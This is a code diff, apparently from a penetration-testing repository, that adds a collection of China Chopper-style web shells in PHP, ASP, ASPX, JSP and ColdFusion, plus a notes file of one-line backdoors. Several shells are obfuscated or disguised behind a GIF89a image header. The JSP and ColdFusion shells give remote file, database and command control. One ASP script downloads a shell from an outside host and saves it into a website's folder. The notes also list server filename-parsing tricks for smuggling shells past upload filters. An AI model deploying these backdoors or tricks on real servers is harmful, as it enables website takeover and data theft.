update webshell Penetration testing2013 beta

caidao-shell/404.php

@@ -0,0 +1 @@
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

caidao-shell/download 下载文件.asp

@@ -0,0 +1,11 @@
+<%
+Set xPost = createObject("Microsoft.XMLHTTP")
+ xPost.Open "GET","http://hack.com/shell.txt",0
+ xPost.Send()
+ Set sGet = createObject("ADODB.Stream")
+ sGet.Mode = 3
+ sGet.Type = 1
+ sGet.Open()
+ sGet.Write(xPost.responseBody)
+ sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2  
+ %>

caidao-shell/fuck.php

@@ -0,0 +1 @@
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

caidao-shell/guo.php

@@ -0,0 +1 @@
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

caidao-shell/hkmjj.asp

@@ -0,0 +1,22 @@
+<%   
+codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"  
+execute (decode (codeds) )   
+Function DeCode (Coded)   
+    On Error Resume Next  
+    For i = 1 To Len (Coded)   
+        Curchar = Mid (Coded, i, 1)   
+        If Asc (Curchar) = 16 then   
+            Curchar = chr (8)   
+Elseif Asc (Curchar) = 24 then   
+            Curchar = chr (12)   
+Elseif Asc (Curchar) = 32 then   
+            Curchar = chr (18)   
+        Else    
+            Curchar = chr (Asc (Curchar) -3)   
+        End if   
+        DeCode = Decode&Curchar   
+    Next  
+End Function  
+'response.write(decode(codeds)) 
+' ²Ëµ¶Á¬½Ó /hkmjj.asp?xx=x ,ÃÜÂë hkmjj
+%>

caidao-shell/ice.asp

@@ -0,0 +1,2 @@
+GIF89a
+<%eval request("ice")%>

caidao-shell/ice.aspx

@@ -0,0 +1,2 @@
+GIF89a
+<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>

caidao-shell/ice.cfm

@@ -0,0 +1,27 @@
+<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.ice#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);
+for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B">
+<CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";
+O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);
+If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C">
+<CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
+<CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;
+if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}
+DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" />
+<cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
+<cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
+<cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
+<CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);
+h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}
+F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D">
+<CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);
+df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();
+for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{
+cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE>
+<CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J">
+<CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>
+FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;
+For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
+<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M">
+<CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
+</CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH>
+</CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>

caidao-shell/ice.jsp

@@ -0,0 +1,59 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!
+String Pwd="ice";
+String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
+Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
+Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
+void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
+void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
+SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
+sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
+else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
+void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
+for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
+void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
+ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
+os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
+void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
+FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
+{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
+void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
+for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
+}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
+int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
+void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
+void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
+void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
+HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
+while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
+void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
+void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
+while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
+void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
+while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
+void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
+Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
+for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
+void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
+try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
+}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
+catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
+}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
+%><%
+String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
+String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
+StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
+if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
+else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
+else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
+bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
+else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
+else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
+else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
+MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
+else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
+}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
+%>

caidao-shell/ice.php

@@ -0,0 +1 @@
+<?php ${${eval($_POST[ice])}};?>

caidao-shell/说明.log

@@ -0,0 +1,86 @@
+   GIF89a   ͼƬͷ
+
+[+]---------------------------------PHP---------------------------------[+]
+<?php @eval($_POST['ice']);?>
+
+<?php header('status:404');${${eval($_POST[ice])}};?>
+
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
+
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
+
+
+<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>  
+
+<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
+// ͬĿ¼���� ice.php
+
+[+]---------------------------------PHP---------------------------------[+]
+
+
+
+***************************************************************************
+
+
+
+[+]---------------------------------ASP---------------------------------[+]
+<%eval request("ice")%>
+
+<%www=REquEst("ice"):EvaL(www)%>
+
+<%
+Dim ConKey:ConKey="ice"
+Dim InValue:InValue=Request(ConKey)
+eval(InValue)
+%>
+
+<%E=request("ice") execute E%>
+
+<%
+Set xPost = createObject("Microsoft.XMLHTTP")
+ xPost.Open "GET","http://www.xxx.com/shell.txt",0 'aspľ���ı���ʽ��ַ
+ xPost.Send()
+ Set sGet = createObject("ADODB.Stream")
+ sGet.Mode = 3
+ sGet.Type = 1
+ sGet.Open()
+ sGet.Write(xPost.responseBody)
+ sGet.SaveToFile "E:\WWWROOT\xxx.asp",2 
+ %>
+
+
+ ���}���������������šԩ͐�    // ANSI��>Unicode ������: a
+ ���}������������������ݩ͐�  //���� ice
+
+
+
+�ϴ�һ��ͼƬһ�仰(xxx.jpg)�����ϴ�һ��.asp�ļ�ȥ����:  <!--#include file="xxx.jpg" --> 
+
+
+[+]---------------------------------ASP---------------------------------[+]
+
+
+
+***************************************************************************
+
+
+
+[+]---------------------------------ASPX---------------------------------[+]
+
+<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
+
+<%@ Page Language="C#" ValidateRequest="false" %>
+<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
+
+[+]---------------------------------ASPX---------------------------------[+]
+
+ IIS 6.0 ����:  x.asp/x.jpg  x.asp;x.jpg �����������ȫ�������λᱻ���أ����Գ��Խ�һ�仰���ļ�����Ϊ  ;x.asp;x.jpg (IIS 7.5 �������� a.aspx.a;.a.aspx.jpg..jpg ������)
+ Nginx ����:    x.jpg/.php   x.jpg%00.php  
+ Apache : x.php.x
+ xx.jpg.jsp,xx.png.jsp
+
+
+ ����Ϊ php��asp��aspxһ�仰ľ���Ŀͻ��ˣ������Ϊ ice ������һ�仰�ļ���д������Щ�����ӹ��������
+
+                                                     -- ����̿� --   
+                                                      2012-07-21